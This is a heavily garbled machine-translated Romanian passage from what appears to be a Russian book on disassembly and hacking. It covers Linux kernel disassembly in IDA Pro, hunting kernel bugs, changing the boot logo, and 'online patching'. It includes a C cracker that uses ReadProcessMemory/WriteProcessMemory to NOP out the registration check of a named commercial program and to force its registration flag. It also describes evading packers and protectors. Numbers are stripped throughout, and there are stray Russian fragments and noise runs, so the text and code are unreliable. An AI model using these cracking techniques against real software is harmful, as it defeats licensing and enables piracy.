întoarcere este de doar octeți Unde merg toți ceilalți?Se dovedește că sunt „rezervate” pentru primele patru argumente transferate prinregistre Celulele „rezervate” conțin gunoi nefertilizat (SPIII) Iată un minim de cunoștințe necesar pentrusupraviețuirea în lumea ferestrelor pe de biți atunci când este programată pe asamblator Rămâne să se ocupe de ultimaîntrebare Cum să obțineți acești de biți?!Pentru a transfera FASM în modul X - , este suficient să indicațidirectiva US și apoi să scrieți programul ca de obicei Listarea oferă un exemplu de cel mai simplu programx - , care nu face nimic, se întoarce doar în valoarea Zero Register RAX Listarea , cel mai simplu program pe biți/ ■, in -s/shu " -": *fig Demontarea nucleului în editorul Hex al editorului NT Fig Editorul NT Edtitor, echipat cu un dizassemblerconstruit, efectuează o căutare integrată în nucleu Un moment interesant: fișierul VMlinuz este încărcat înDizassembler!Cel mai interesant lucru începe: IDA -ul RGO nu poate identifica formatul și îl încarcă ca un binar, iaracest lucru nu este bine!Nucleul are o structură complexă formată din mai multe încărcătoare, care practică secvențialuna după alta (o analogie cu treptele rachetei este destul de adecvată), iar partea principală a nucleului esteambalată Cum să te descurci cu toate acestea?Sarcina minimă: pentru a ridica nucleul de pe module, determinând adresa debază a cizmei și descărcarea fiecăruia dintre ele Cineva poate spune și ce, gpava Studii ale nucleuluilinux De fapt, problema?Până la urmă, avem texteleoriginale!Ei bine, textele inițiale sunt, desigur, bune, dar întrebarea este - la care parte din miez corespunde?Deci,fără un ghid bun, este foarte ușor să te pierzi aici!Primii octeți OH ale fișierului VMiinuz aparțin sectorului depornire, care este încărcat la adresa : C și este efectuat în mod pe biți Apăsați combinația de tastatură + sau selectați din meniul de comandă Editare |Segment |Editați segmentul Introduceți numele segmentului: Boot,lăsăm adresa inițială neschimbată și înlocuim adresa finală cu H (Fig ) Răspundem la toate avertismenteleformidabile fără echivoc Da Apoi aducem cursorul la primul octet al codului și apăsăm tasta pentru a transformacelulele de memorie în cod După aceea, DizassMitting poate fi continuat ca de obicei Codul sursă al bootloader -uluipoate fi găsit în fișierul \ arch \ i \ boot \ bootsect s Adevărat, este demn de remarcat faptul că s -ar putea să nuse facă acest lucru, deoarece în mulți ani, încărcătorul a fost lins Chiar dacă unele bug -uri au rămas în ea, estepuțin probabil să puteți trece printr -o gaură din sistemul de securitate Linux cu ajutorul lor Orez Modificareaatributelor segmentului din IDA Pro vedem că sectorul de pornire se deplasează la adresa H: Ooooh și citește un bootloader secundar de pe disc, care este, de asemenea, situat în interiorul Vmiinuz, imediatdupă sectorul de pornire Iată modulele de configurare și video s, încărcarea la loooh: ooooh și lucrează în modul pe biți Modulul Startup S este recunoscut de semnătura HDRS în urma JMP Sfârșitul video S este ușor de determinat dupălinii: CGA, MDA, HGA, EGA, VGA, VESA, Adaptor video, în urma căruia „Consiliul magic” este oo oo oo v oo oo oo oo oo oooo oo oo OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OO OOOO OO ONA OO OO ON ON ON ON ON ON ON ON On on on On On activat On On activat On On activat ON ON ON ON UN NUMEÎn ambelenuclee, acesta este localizat în funcție de compensarea I FFH de la începutul fișierului Astfel, bootloader -ul secundarîncepe cu un offset OH și se termină în I FFH De asemenea, este executat în modul pe biți și este un amestec de codși date, deci trebuie să fie dezasamblat cu mare precauție (Fig ) Dar înainte de a face acest lucru, este necesarsă se creeze un segment, deoarece segmentul anterior a fost trunchiat!Alegeți din meniul de comandă Editare |Segment|Segment nou, introduceți numele segmentului (de exemplu, IDR), adresa de pornire ( H) și sfârșitul (ISOOH), precum șiadresa de bază egală cu particularul de a împărți adresa de pornire la H În continuare, ar trebui să setați în modcomparau un mod pe biți și să apăsați OK În spatele bootloader -ului secundar urmează aspectul „Nu -By -Bytes” umplutcu zerouri Apoi, începând cu deplasarea ISOOH, există un fel de cod „sălbatic” care nu reușește să dezasambleze IDA Proia doar câteva rânduri, după care refuză categoric să continue să funcționeze (lista ) În continuare, „Combinațiifierbinți” sunt indicate pentru IDA Pro , în alte versiuni pot varia ușor Partea a IV -a Metode avansateDizAssmit Fig Bootloader secundar, care este un amestec de cod și date i^Sting ZZl Ida Pro Naninegdisa dincodul „sălbatic” Sasssriss și eșuează CLD CLI MOV AX, H DB DB DB EH;O dB D H;+ NTA și HIEW, la prima vedere, fac față Dizassempling of the „Cod sălbatic” Dar, din păcate, o fac greșit(listarea ) -m'l n 'diza^mryir and the wild code o' & fâ "iagir hei fc CLD B MOV AX, x Adăugare [BX+SI], AL ED MOV DS, AX EC MOV ES, AX B EE MOV FS, AX D EE MOV GS, AX CAPITOLUL Studii ale nucleului Linux , toate acestea se datorează faptului că miezul începe să fie executat în modul securizatpe de biți și pentru o dizassemblificare adecvată, descărcarea segmentului trebuie schimbat Când se va face acestlucru, IDA Pro va funcționa ca și cum nu s -ar fi întâmplat nimic Acum suntem în Unpacker, pregătind principalul codnuclear pentru muncă Este implementat în fișiere \ arch \ i \ boot \ comprimat \ head s și mic c El nu are o adresăde descărcare „personală” și este încărcat împreună cu bootloader -ul principal la LoOOH: OOOOH Astfel, primul octet alUnpacker este localizat în memorie la adresa YOOH: OOOOH + SIZEOF (IDF) == OH: OI OH, care corespunde adresei fiziceIoizoo Unpacker stabilește registre segmentate DS, ES, SS, GS, FS pe selectorul H și înregistrarea CS pe selectorul H La sfârșitul Unpacker, există un sistem de linii de text oprit, OK, pornind nucleul, formatul comprimat nevalid (err= l), ar trebui să fie urmat un lanț lung de zerouri și apoi începe un cod ambalat, care este imposibil fără prealabildespachetare Cum să -l despachetați?Adepții Linux nu le place să inventeze o bicicletă și se străduiesc întotdeauna săfolosească componente gata, astfel încât miezul să fie ambalat în format GZIP Codul ambalat începe cu „Secvența magică” F B , care este ușor de găsit în orice editor Hex În nucleul este localizat în funcție de deplasarea H, iar în nucleul - conform deplasării D H de la începutul fișierului Selectăm zona, pornind de ladeplasarea corespunzătoare până la sfârșitul fișierului, apoi o scriem în fișier cu extensia GZ (de exemplu,kernel gz) După ce l -am prelucrat folosind GZIP (gzip -d kernel gz), vom primi la ieșirea gata -pentru -dizassembingimaginea nucleului Încărcăm imaginea rezultată în IDA Pro Codul principal principal este executat în modul pe de bițiși este încărcat în memorie la : eolooooh La început, există un modul \ arch \ i \ kemel \ head s, și apoi -init c, încărcând toate celelalte module Cum să determinați ce fel de modul în care corespunde această parte a coduluiDizAssembler?Catalogul /Boot se află un fișier minunat de sistem map-x y z (unde X Y Z este numărul versiunii nucleare),care listează adresele numelor simbolice publice, cunoscute și sub denumirea de mărci (lista ) C TSISTEM CALL C C T RET FROM SYS CALL C AD T RESSTORE ALL C BC T Signal Return C D T V SIGNAL RETURN C E T TRACESYS C A TRACESYS EXITC Al T Badsys, în special în nucleul de TAGSDupă ce am eliminat adresa de bază de aici, vom primi o schimbarea etichetei de la începutul fișierului: ch, dar este ușor să găsim o etichetă ca atare în textele sursă printr -ocăutare globală Este definit în fișierul \ arch \ i \ kemel \ intrări s Marcajele rămase sunt procesate în modsimilar Și iată un alt truc: dacă o linie de text sau o echipă „rară -arth” precum ISS sau MOV SG , XXX s -a întâlnit înnucleu, atunci căutarea globală o va găsi cu ușurință în textele originale Deoarece compilatorul de astfel de comenzi nueste evident perceput, inserția de asamblare a avut loc clar aici, ceea ce înseamnă că codul Dizassembler va coincideaproape complet cu fragmentul corespunzător al textului original!Într -o comună, în Dizassamblarea nucleului nu existănimic supranatural, iar această sarcină este destul de capabilă de o cultură obișnuită Partea IV Metode avansateDizAssmit în care erorile în programele de aplicații și aplicațiile de server cuibăresc cel mai mare număr de erori suntconcentrate în tampoane copleșitoare (un atac asupra depășirii tamponului sau a tipului de depășire tampon) Există, deasemenea, un tampon în nucleu, iar unele dintre ele pot fi copleșite, dar atacurile acestui tip nu sunt atât decaracteristice pentru el Iată cele cinci surse principale de blocarea erorilor-mutuale, cunoscute sub numele de blocuride rotire (încuietori de rotire), ieșiri neașteptate din funcție, elf-loader, virtual de memorie manager și stbt-stls/ir Luați în considerare mai detaliat toți candidații Blocurile spinate sunt numite celule de memorie careprotejează codul multitask de efectele fluxurilor străine (lista ) La intrarea în zona protejată, procesorulstabilește steagul, iar la ieșire - picături Până la scăderea steagului, fluxurile rămase sunt într -o stare deașteptare și nu pot executa codul Pe nucleele multiprocesorului, spinul de blocare a spinului începe cu prefixulboskului, care este ușor de găsit în textul DizAssembler, dacă apăsați + Sprijinul pentru multitasking estefoarte complicat în implementare, iar greșelile sunt pur și simplu întunericul , așa că nimeni nu trebuie să se plângăcă „toate bug -urile au fost deja schimbate la noi” Din păcate, cele mai multe erori ale multitasking -ului sunt maimulte etape, deci nu există metode universale pentru căutarea lor Aceasta este o muncă pentru hackerii adevărați carepot ține întregul nucleu în cap și pot pune un mozaic fragmentat într -o singură imagine În general, un adevărathardcore Este complicat?Desigur!Dar nu căutăm căi ușoare, nu?Dar satisfacția din gaura găsită este mult mai mare Kernel - C A E OS S AB E :;CODE XREF: sub C A +l j j kernel:C A E lock dec byte ptr [ebx- FCE F h]kernel:C A js loc C AA Неожиданные (или преждевременные) выходы из функции (unexpected functiontermination) происходят всякий раз, когда из-за какой-то ошибки Funcția nu mai poate continua să funcționeze și facereturnare imediată O parte din lucrare până în acest moment a fost deja finalizată, iar unele nu sunt încă Dacăprogramatorul permite chiar cea mai mică neglijență, atunci structurile de date se vor transforma în terci Una dintreaceste erori este cuprinsă în funcțiile create elf tables, care vor fi descrise în detaliu în capitolul Pentru agăsi ieșiri premature, este suficient să mergeți la sfârșitul funcției și să analizați legăturile încrucișate care seridică (listarea ) Cu cât există mai mult, cu atât este mai mare probabilitatea ca ceva să nu fie în regulă aici Eibine, nu există deja departe gaura Kernel: C A OS S A :;Code Xref: Kernel: C A F TJ Kernel: COI A MOVEAX, OFFFFEAH KERNEL: C A KERNEL: C A LOC C A : KERNEL: C A KERNEL: C A POP EBX;Cod xref:kernel: coi a cftj;Kernel: C A TJ Kernel: C A Pop Kernel: C A POP ESI EDI Kernel: C A POP EBP Kernel:C A Pop Ecx Kernel: C A A Retn , mai detaliat Capitolul Studii ale fișierelor Elf Nucleus Nucleus Linux , manager de memorie virtuală și STBT-STL/IR- Acestea sunt aisberguri adevărate, bombate ca munții de gheață, acăror cea mai mare parte este ascunsă în adâncul apei Acestea sunt sute de mii de linii de cod care interacționează într-un mod complex Acesta este un sol fertil pentru tot felul de bug -uri, rătăcind de la o versiune a nucleului laalta Unele dintre ele au fost deja identificate, alții încă nu au găsit În primul rând, ar trebui să acordați atențieprocesării câmpurilor non -standard sau unei combinații sălbatice de diverse atribute Pentru a acționa nu orbește, aresens să descărcați Fresh Binder RFC (http://wwww rfc-editor org) și să achiziționați specificația pentru formatul ELF(http://www cs princeton edu/courses/ Fall /COS /DOCS/ELF FORMAT PDF) Așa că am ajuns la nucleu!Plonjat în prezent Lumea Dizassembler a văzut cum Linux arată nu numai din exterior, ci și din interior Acum cel mai important este să airăbdare Nu conta pe succesul rapid Timp de luni, puteți pleca pentru căutarea primei gauri, mai ales dacă nu ațicâștigat încă suficientă experiență în DizassMitting și să întoarceți constant cartea de referință bătută în echipele demașini În modul Deep Khachini, hackerii nu ies de pe computer timp de sau chiar de ore Demontarea estedependentă!Este ușor să intri în labele lui, dar este foarte dificil să te eliberezi!Secretele lui Kernel Haking care nuvoia să hack Linux Core?Fiecare Linuxoid care respectă auto -respectul trebuie să încerce să facă acest lucru!La urmaurmei, Linux, spre deosebire de Windows, este un adevărat teren de antrenament pentru hacking, topind oportunitățineașteptate Luați cel puțin logo -ul care apare pe ecran Deci, este timpul să -l ridici pe Gimp și să deseneziceva „Haks” (hacks) se numesc tot felul de trucuri, glume amuzante și trucuri originale, în timp ce „hacking” (hacking)este înțeles în mod tradițional programe de hacking sau atacuri de rețea Pare a fi termeni similari, dar care estediferența!Cu miezul Linux, puteți face multe experimente interesante Să începem cu o schimbare a logo -ului Schimbămlogo -ul Linux de obicei atunci când încărcarea Linux apare un pinguin caracteristic care nu va mai surprinde penimeni Vreau ceva nou Cum să schimbați logo -ul standard pentru ceva propriu?Există mai multe moduri Să începem cucompilarea nucleului Următoarele fișiere sunt responsabile de afișarea logo -ului:/usr/src/linux/drivers/video/* și/usr/src/linux/include/linux/linux logo h Ori de câte ori miezul este încărcat în modul Debug (Debug) sau Silent(Quiet), aceste fișiere sunt compilate, desigur, primesc control și afișează imaginea pe ecran Logo -ul în sine trăieșteîn fișierul logo -ului Linux h, unde este stocat sub forma unei game obișnuite de date, a cărei fragment este dat înlista pentru claritate ;Listarea ZZ-BФрагмент файла llnuxJogo h, содержащий логотип unsigned charlinux logo bw[] initdata = { OxFF, OxFF, OxFF, OxFF, OxFF, OxFF,OxFF, OxFF, OxFF, OxFF, OxFF, OxFF, OxFF, x , x , x F, OxFF, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff,Oxlf, Oxfe, Oxlf, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxfe, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff,Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff, Oxff Oxfe, x F, Oxff, Oxc , Oxff, Oxff,Vezi Elves Fall în Dumps din capitolul Capitolul Partea IV Metodele avansate DizAssmit pot fi modificate atâtmanual, cât și automat Nu vom atinge regimul manual, deoarece aceasta este o procedură de rutină obișnuită Este mult maiușor să începeți o utilitate specială și va face totul automat Spre deosebire de Windows, sub Linux, codul sursă estedisponibil gratuit Prin urmare, putem analiza cu ușurință ce face acest program sau acel program și dacă avem nevoie deel Intervenția în miez este întotdeauna plină de consecințe fatale Un pas greșit - și sistemul refuză să încarce sau sădistrugă toate datele de pe hard disk sunt curățate Prin urmare, înainte de orice instalare a unui program potențialnesigur, este necesar să parcurgeți textul original și să vedeți ce fișiere se schimbă Rămâne să le rezervați pe undisc, un disc CD-R/RW sau un card de memorie flash Și puteți porni cu CD live!Vom folosi utilitatea Iodo, care poate fidescărcată de pe serverul belgian democratic: http://users telenet be/ertu/linux/fbdev/logo html, despachetat arhiva,vom găsi trei c-files și unul Makefile Din păcate, nu există fișiere binare și trebuie să fie compilate independent Douăversiuni ale nucleelor ​​sunt acceptate - cu numerele și În versiunea , totul s -a schimbat semnificativ șiare nevoie de abordarea sa Vom vorbi despre versiunea puțin mai târziu, dar deocamdată vom reveni la sarcina noastrăactuală Analiza arată că utilitatea logo -ului constă de fapt din două părți: convertorul imaginii de intrare concentratîn fișierul pnmtologo c și direct patcher -ul principal, concentrat în fișierele logo c și logo c (fiecarepentru versiunea sa a nucleului) Strict vorbind, logo c include extractorul logo -ului și patcher -ului curent, iarlogo c este doar un extractor al logo -ului de format vechi În ambele cazuri, logo -ul în sine este un fișierobișnuit de format CRC, cu o adâncime de culoare de cel mult de culori și o suprafață totală de cel mult pixeli (ceea ce corespunde rezoluției x ) Convertorul nu prezintă un interes deosebit Apropo, în loc de acesta,puteți utiliza pluginul pentru editorul GIMP: http://registry gimp org/detailview phtml?plugin=linux+Logo Dar atunci unextract/patcher ar trebui să arunce o privire mai atentă Fragmentul cheie al fișierului logo c este dat în lista - •; ■ - ■■ ■> ■ • • • • • • • logo linux clut ppm , apoi transferăm fișierul rezultat lalocul implementării constante cu utilitatea CP : /WED LOGO LMUX CLUT PPM/usr/src/linux/drivere/video/logo/ Rămânedoar pentru a configura miezul, pentru care puteți utiliza un configurator interactiv Printre alte puncte utile (și nuașa) din acesta vor fi logo-ul de pornire și opțiunile standard de logo Linux de culori Asta trebuie să fie luate(listarea ) Drivere Device -> Suport grafic -> [*] Suport pentru dispozitivele tampon de cadru [*] Vesa VGA GraphicsSupport Console Afișare Suport driver -> глава исследования яраLinux [*] Suport de selecție a modului video FrameBuffer Consola] Selectați fonturi compilate [*] VGA x Configurare logo font-> [*] logo de pornire [*] Standard -colo-color LinuxCompletarea tuturor lucrărilor pregătitoare, re-combaterea nucleului, pornirea nucleului și ne vom rezolva Fișierul deconfigurare/boot/grub/grub/grub/grub meniu lst, adăugând cheia ѵda = x și kernel (hdo, )/vmlinuz root =/dev/sda vga = x Reîncărcat Noul logo va apărea solemn pe ecran, strălucind cu toate cele de culori ale sale Frumos?Maidegrabă, alapoto Hackerii reali recunosc doar un terminal de text și un mod de consolă cu ANSL-PSHEEVROGRAFICE ASCII-lotipurile care pot fi instalate folosind programul LinuxJogo (http://www deater net/veve/vmwprod/linux logo/) suntfoarte populare Există, de asemenea, o colecție de probe finite Programul este actualizat constant, iar cea mai recentăversiune nu a fost lansată mai mult de august Capitolul Metode moderne de patching din capitolul ,„Încălzire”, am considerat deja mai multe exemple practice de hacking Cu toate acestea, acestea au fost exemple banale,cunoscute și sub numele de „bit-hacks” A fost timpul să revenim la acest subiect și Luați în considerare metode maicomplexe În acest capitol vom lua în considerare următoarele subiecte: □ Cascadorii și secretele patchingului online □Hacking Aplicații client folosind tehnologii Stealth □ Patch -uri autonome și online Windows NT/ /XP, precum șiutilizarea documentată și funcții nedocumentate pentru eliminarea protecției nucleului de la modificarea online □Tehnologia de depășire a ecranului albastru al morții (BSOD) Secretele patch-ului online după cum știți, patchingautonom (aka patch off-line, aka bit-hack) este să încărcați programele hackneyed la editorul hexadecimal (de exemplu,hiew) și modificări ale unei perechi de octeți (de exemplu, H pe ECH) Ce se întâmplă dacă programul este ambalat?Avemdouă modalități de a-l despacheta și de a-l hack în off-line sau, după ce am așteptat finalizarea despachetării,modificăm memoria procesului din zbor, ocolind rapid capcane, cum ar fi testarea CRC Aceasta este ceea ce vom vorbidespre această metodă!Înlăturarea unui ambalator/rulare serioasă este extrem de dificilă Nu există despackers decalitate și trebuie să lucrați cu mâinile În plus, cele mai recente versiuni ale protectorilor joacă glume rele pesteCrackers, de exemplu, fură o parte a instrucțiunilor, introduc codul P, emulează implementarea tranzițiilor condiționateetc Ca urmare a acestui fapt, programul nepachetat funcționează Instabilă și căderea periodică în următoareacapcană Căutarea și eliminarea unor astfel de capcane ascunse necesită mult timp, iar succesul nu este garantat Obținețio groapă potrivită pentru Dizassembbing (dar nu pentru lansare!) Este relativ ușoară, iar instrumentele PE cu aceastăsarcină cu această sarcină mai mult decât Programele cu criptare dinamică sunt de obicei examinate într -undebugger Căptușind toate speranțele pe o rulare cu balamale, programatorii sunt destul de nepăsători legați de„reactorul termonuclear” al mecanismului de protecție care este responsabil de monitorizarea numărului de serie,verificarea numărului de lansări, expirarea liniei de testare, etc poate fi încă hacked prin editarea doar câțivaocteți Acesta este doar acești octeți sunt situați adânc sub un strat de cod ambalat În acest caz, Hiew cu sarcina „Întimpul criptării dinamice, decodarea este în porțiuni mici, iar fragmentul care a lucrat este imediat criptat Capitolul Metodele moderne de patching nu mai pot face față și este necesar să acționați într -un mod diferit Hackerullansează un proces rupt pentru execuție, așteaptă câteva secunde, astfel încât tot ceea ce este necesar are timp să sedespacheteze, apoi modifică imaginea procesului direct în memorie!Această abordare se numește patching online (patchingon-line) Desigur, schema dată este departe de a fi ideală și nu ia în considerare o serie de realități practice Dar, cutoate acestea, trebuie să începi undeva!Cel mai simplu patcher on-line a citit memoria procesului „extraterestru” alfuncțiilor ReadProcessmory, iar înregistrarea este WriteProcessMory Unii autori scriu că este necesar să opriți toatefluxurile procesului înainte de a -l păstra Prin suspendare și după aplicarea patch -ului, reluați implementarea lor prin funcția de reluare Dar nu este așa!Putețiface un proces activ, dar o singură echipă la un moment dat În caz contrar, este posibilă o situație în care procesul vafi întrerupt între echipele modificate Vă rugăm să rețineți că aceste comenzi vor fi înlocuite cu acel moment și nufaptul că limitele noilor echipe vor coincide cu cele vechi Cu alte cuvinte, nu este garantat că EIR va indica începutulechipei și nu la mijloc Apoi, comportamentul programului de defalcare devine imprevizibil și ne prăbușim, deșiprobabilitatea acestui eveniment este nesemnificativă Faceți acest lucru corect: opriți toate fluxurile, apoi citițicontextul fiecăruia dintre ele cu funcția GetThreadContext, asigurându -vă că niciunul dintre fluxuri la un moment datnu execută un cod hackneyed În caz contrar, este necesar să reglați EIR, să -l reinstalați la începutul unei echipehacked, fie să decongelați fluxurile și să așteptați puțin mai mult Dar, în primul rând, este prea dificil și, în aldoilea rând, oprirea și reînnoirea fluxurilor pot apărea foarte mult, deoarece nu toți programatorii monitorizeazăsincronizarea Vom acționa într -un mod simplu, dar destul de fiabil, declanșat în , % din cazuri Începem procesul,așteptăm câteva secunde în timp ce despachetarea se termină Apoi citim memoria procesului activ pentru a ne asigura căaceastă adresă este localizată exact ceea ce avem nevoie (altfel jurăm la versiunea greșită a programului de defalcare)și „On Fly” scriem versiunea „corectată” a Comenzi de mașină aici Luați, de exemplu, utilitarul NTExplorer din software-ul Runtime Folosind utilitatea PEID, ne vom asigura că programul este ambalat folosind Aspack c, ceea ce sugereazăcă un bit-hack este imposibil Bine!Înlăturați depozitele de pe program, încărcăm gunoiul obținut pe dizassembler și prinlegături încrucișate către Fornk pentru a licența linia Diskexplorer de licență, vom introduce codul afișat în lista E DB Apelați sub e b e e test al, al e e JZ ​​ E E MOV E E MOV E ED MOV LOC E A EAX,DWORD CE B, [EAX+ H], ;-> Înregistrarea a eșuat Înregistrarea datelor în registru E F JZ LOC E A E FBPUSH E FD MOV E A MOV DL, CX, WORD E B E A MOV EAX, ATHANKYOU;„Gândiți -vă la licențiere ” Vedemtranziția condiționată JZ OS E A , „SHUNTING” ieșirea liniei la înregistrarea cu succes Evident, după ce l -amînscris cu două comenzi NOP (cu excepția cazului în care Partea IV sunt prezente în program Metode avansateDizAssMitting ale altor inspecții), vom rupe protecția și apoi orice număr de înregistrare va fi perceput ca fiindcorect Scriem un „Lobern” automat, al cărui algoritm este clar din comentarii (lista ) Listarea Cel mai simplu„resturi”, care se suprapune patch -ului în -line -ntexplorer crack c main (int c, char ** v) {dword n;Startopinfosi;ProcessJnFormation Pi;Char nesemnat *buf;// date pentru patch (exemplu) nesemnat char x old [] = { x x );Nesemnatchar x new [] = { x x };Void* x off = x e e ;// octeți originali // octeți hacked // adresa pentru haka memset (&Si, , sizeof (SI)); buf = malloc (sizeof (x old));// Lansarea If Hack ('CreateProcess ( , getCommandline () + strlen (v[ ]) + ((GetCommandline () [ ] ==' \ "')? : ), , , = [ ] = [ ] = ] = [ ] = = \ " ) : ); +) {printf ("pis,așteptați:%c \ r", "-\\ |/ |" [n% ]); somn (loo);} // Începem să patching printf ("OK, faceți parch \ N "); //Verificarea versiunii programului Broken ReadProcessMory (pi hprocess, x off, buf, sizeof (x old), & n); if! = Sizeof(x old)) returnare printf (" -orirIreading vm-memory ! \ X \ n' ); if (x old, buf, sizeof (x old))) return printf ( -rr: incorect ver \ x \ n ");// PathEmy Conditional Transition WriteProcessMemory (pi hprocess, x off, x new, sizeof(x new), & n);if (n! = sizeof (x new)) return printf ("err: scrierea vm-memory '\ x \ n");Lansăm ntexplorer crack c,indicând numele programului spart (împreună cu argumentele, dacă există) de pe linia de comandă În acest caz, aparurmătoarele ASPACK a despachetat codul și transmite gestionarea programului Programul nostru de hacking automat esteîncă în așteptare Programul descoperă că nu este înregistrat, iar perioada demonstrativă a expirat de mult timp Prinurmare, programul afișează caseta de dialog care solicită introducerea numărului de serie Până în acest moment, răbdareavieții noastre se termină, iar în timp ce utilizatorul introduce primul număr de serie care mi -a venit în minte, JZ OS E A este înlocuit cu succes de NOP/NOP, iar atunci când apăsați OK, protecția mulțumesc utilizatorului pentruînregistrare și continuă pentru a executa programul ca de obicei (Fig ) Folosiți, oameni, pentru sănătate Desigur,la Următoarea lansare a casetei de dialog cu cerința de înregistrare va apărea din nou, distragându -ne de la muncă șiobligându -ne să introducem numere de serie Este posibil să faceți fără ea cumva?Poate sa!Și acum vom arăta cum!GPAVA Metode moderne de patching Fig În ciuda faptului că la începutul programului, apare o casetă de dialog carenecesită înregistrare, orice cheie de înregistrare este percepută ca rasa corectă a programului continuând, găsim câtevacomenzi curioase: MOV B, [EAX+LOH], /Mov EAX, DWORD CE , Evident, instalarea steagului de înregistrare (care esteușor de verificat cu experimental sub debugger) Idee!Pentru a rupe programul în sfârșit, este necesar să setați steagulde înregistrare pe unitate înainte de citire Cu alte cuvinte, trebuie să mergeți înaintea protecției!În vremurile bune,această sarcină a fost rezolvată în pas cu pasul de pas, dar acum protectorii au devenit semnificativ mai avansați și nuse vor lăsa doar să se urmărească Cu toate acestea, întrucât codul a fost despachetat, iar transferul de control alprotecției durează ceva timp, este posibil să ajungem cu mult înaintea protecției dacă efectuămReadProcessMory/WriteProcessmory în ciclul infinit Pentru fiabilitate, puteți scădea prioritatea procesului rupt, pentrua nu -i da prea multe cantități de procesor Cu toate acestea, dacă sunteți transportat prea mult, dezambalarea poate sănu se termine niciodată deloc În cele mai multe cazuri, pentru hacking -ul de succes, nu sunt necesare delocpriorități!Întreaga dificultate în acest caz constă în faptul că locația pavilionului de înregistrare nu este definităîn avans Știm doar că este stocat de trecerea LOH din blocul de memorie, care este indicat de dubla cuvânt CE H,inițializată în timpul implementării programului În consecință, algoritmul acțiunilor noastre va fi următorul: Așteptămmomentul în care S Y dobândește o importanță inutilă și scriem valoarea Yunului prin deplasarea lui Yun, după carepărăsim ciclul și permitem programului să continue al nostru implementare Programul, desigur, va rămâne în eroarea căeste înregistrat cu succes Fragmentul cheie al codului care realizează acest algoritm este dat în lista Jashi //așteptăm inițializarea x off în timp ce (! X) readProcessmemory (pi hprocess, (void*) x off, & x, sizeof (x), & n), //așteptăm inițializarea The Inițializarea Steag de înregistrare și înregistrare a rezultatelor în timp ce verifică (număr++ #include main () {unsigned int p = x ;// Adresa inițială în timp ce (p)// Efectuăm ciclul în Windows X Această funcție nu funcționează, dar acest sistem de operare lent, dar constant, iesedin utilizarea GPAV Modele moderne de patching // Concluzii ale adrese ale tuturor paginilor, la care are acces la IF (ÎisbadCodePtr (p)) printf ("% xh", p);// treceți la pagina următoare p+= x ;Orez Paginide memorie disponibile la execuția EH au stricat o astfel de idee deși, opriți -vă, nimic răsfățat!La urma urmei, peinelul zero (și șoferul nostru este efectuat acolo), puteți face orice Este puțin probabil să putem crea inteligențăartificială, dar putem opri apărarea Adevărat, va fi prea vizibil, urât și, de asemenea, o soluție nesigură Protecția pejumătatea superioară a memoriei nu este în zadar Nu permite distincția aplicațiilor și, deși sistemul de operare va trăicalm fără o astfel de protecție, va fi doar barbarism Să efectuăm un simplu experiment-scrierea unui program caretransferă controlul undeva în adâncul nucleului și să vedem ce se întâmplă (listarea ) Apoi vom lansa acest programpentru execuție și vom arunca o privire asupra rezultatului (Fig ) ^localizat „= #include main () Partea IV Metode avansate de dizassembing char *p;// Adresa arbitrară în jumătatea superioară a spațiului de adresă p =(char *) xbe fac ;( Modul de aplicare, precum și ne așteptăm, obținem o excepție de la tipul de „eroare de acces”, iarîn loc de nucleu, controlul este transmis la procesorul de excepție structurală Fiecare proces are cel puțin unprocesor structural instalat de operare Sistem Afișează mesajul notoriu despre o eroare critică și completeazăaplicația și completează aplicația, programatorul își poate stabili, de asemenea, procesoarele care intercepteazăexcepțiile și într -un fel sau altul procesând situația critică Din păcate, toate sunt efectuate în Contextul acestuiproces, despre dificultățile de introducere în spațiul de adresă al căruia tocmai am spus Nu există niciun termenlimită! De fapt, nu există niciun termen! în modul nucleu și se transferă către conducereE a sistemului de operare, maiprecis, până la codul, care indică elementul corespunzător al tabelului de întrerupere (tabelul de întrerupere adescriptorului, IDT) Reprezentarea schematică a IDT este prezentată în Fig Orice șofer poate modifica cu ușurințăconținutul IDT la discreția sa, intercepând toate întreruperile de care are nevoie Tehnica de interceptare este descrisăîn detaliu în orice carte dedicată programării într -un mod protejat și, în special, manualului Yurov, care se numește„asamblator - manual” Există, de asemenea, cărți de S V Zubkov , multe V I Yurov "Asamblator Manual pentruuniversități "- Sankt Petersburg: Peter, S V Zubkov "Asamblator pentru DOS, Windows și UNIX "-St Petersburg:DMK-Press, Peter, GPAVA Patch-uri moderne de patching Guki Guki și binecunoscuta poștă a lui OlegKalashnikov (http://kalashnikoft ru/), deci nu ne vom repeta aici Orez de cod țintă Schema de organizare IDT esteprincipalul lucru că este încă posibil să ne rezolvăm problema În ciuda faptului că jumătatea superioară a spațiului deadrese nu este disponibilă proceselor aplicate, punctul hardware transferă totuși controlul către procesor, iar lanivelul aplicat acest lucru se desfășoară neobservat, iar cazul pur și simplu nu ajunge la SEH Aceste vicisitudiniascund metamorfoze de programare într -un mod protejat Adresa liniară a punctului de oprire este stocată în registreleDRO-DR Acest lucru este menționat de documentația de marcă de la Intel și AMD Codul sursă al interceptorului cu toatecomentariile este prezentat în cartea menționată în mod repetat „Tehnica și filozofia atacurilor hackerilor” Înfamilia Windows NT, natura punctelor de oprire este pur locală Fiecare proces deține propriul său set de registreDR -DR și, deși numărul de opriri ale opririi nu crește din acest lucru, acestea funcționează doar în contextulprocesului în care au fost instalate Acest context din nou!Nici o singură întreprindere nu poate face fără ea Aceastaeste natura ferestrelor multitask NT În Windows X, totul este mai ușor Acolo, punctele de oprire sunt de naturăglobală, care se extinde la toate procesele, ceea ce este atât bun, cât și rău în același timp Este bine pentru căinstalarea punctelor de oprire nu trebuie să fie introdusă în procesul altcuiva, dar este rău, deoarece punctele opririisunt declanșate în fiecare proces, iar mânerul trebuie să -și dea seama cine este cine Din fericire, avem la dispozițianoastră două funcții puternice GetThreadContext și SetThreadContext Primul - citește contextul fluxului, al doilea set,respectiv, În termeni generali, algoritmul arată astfel: determinăm PID -ul procesului dorit (și îl puteți determinafolosind apelurile Toolhelp , care sunt descrise în orice întrebare frecventă a hackerului sau cu ajutorul unui la felde bine cunoscut subliniat Funcțiile ZWQueryInformationProcess descrise acolo) PID -ul rezultat este transmis de creaolhelp snapshot, creez 